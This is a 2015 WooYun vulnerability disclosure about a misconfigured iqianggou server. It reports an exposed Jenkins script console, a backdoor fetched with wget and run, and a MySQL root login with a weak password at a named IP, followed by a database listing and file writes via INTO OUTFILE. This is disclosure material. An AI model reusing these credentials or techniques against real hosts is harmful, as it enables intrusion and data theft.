当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130879

漏洞标题:iqianggou服务配置不当getshell可内网漫游

相关厂商:上海多维度网络科技有限公司

漏洞作者: new

提交时间:2015-08-07 10:18

修复时间:2015-09-21 10:20

公开时间:2015-09-21 10:20

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://27.115.51.166/script
命令执行,虽然是jenkins用户,但是有可写目录 /data

1234.png


使用wget从网上下载一个后门脚本再跑起来,一切都OK了

12.png


不对,地址里边好像还有其它的东东,什么192、172、10,你懂的
后续影响有点严重,就不再深入,没有任何恶意操作

漏洞证明:

mysql -u root -p123456 -h 27.115.51.166
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 218
Server version: 5.6.23-72.1 Percona Server (GPL), Release 72.1, Revision 0503478
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+----------------------------+
| Database                   |
+----------------------------+
| information_schema         |
| backup_iqg_new_dev_0601    |
| backup_iqg_new_prod        |
| edusoho                    |
| employees                  |
| ezpublish                  |
| fff                        |
| fs                         |
| iqg_64832_all              |
| iqg_dev                    |
| iqg_main                   |
| iqg_main_staging           |
| iqg_manage_back            |
| iqg_new_dev_0601           |
| iqg_new_prod_0601          |
| iqg_prod_102275            |
| iqg_prod_68514             |
| iqg_prod_back              |
| iqg_staging                |
| iqg_staging_150302_old_bak |
| iqg_stats_backup           |
| iqianggou_old              |
| kunstmaanbundles           |
| mydb                       |
| mysql                      |
| performance_schema         |
| scourgen_test              |
| scourgen_test_1            |
| sonata_sandbox             |
| test                       |
+----------------------------+
30 rows in set (0.05 sec)


好多数据,而且可以写文件
看如下:
mysql> select 'this is a test,please give 20 rank' into outfile '/data/test.txt';
Query OK, 1 row affected (0.07 sec)
mysql>
/data/test.txt 请自行删除
下图证明问题:
mysql> select load_file('/data/test.txt');
+-------------------------------------+
| load_file('/data/test.txt') |
+-------------------------------------+
| this is a test,please give 20 rank
|
+-------------------------------------+
1 row in set (0.05 sec)
mysql>

修复方案:

不用的系统删除
看到给别人礼物了,连着找了两个搞危害的,不知道有没有我的
我想每个漏洞要20rank不过分吧

版权声明:转载请注明来源 new@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论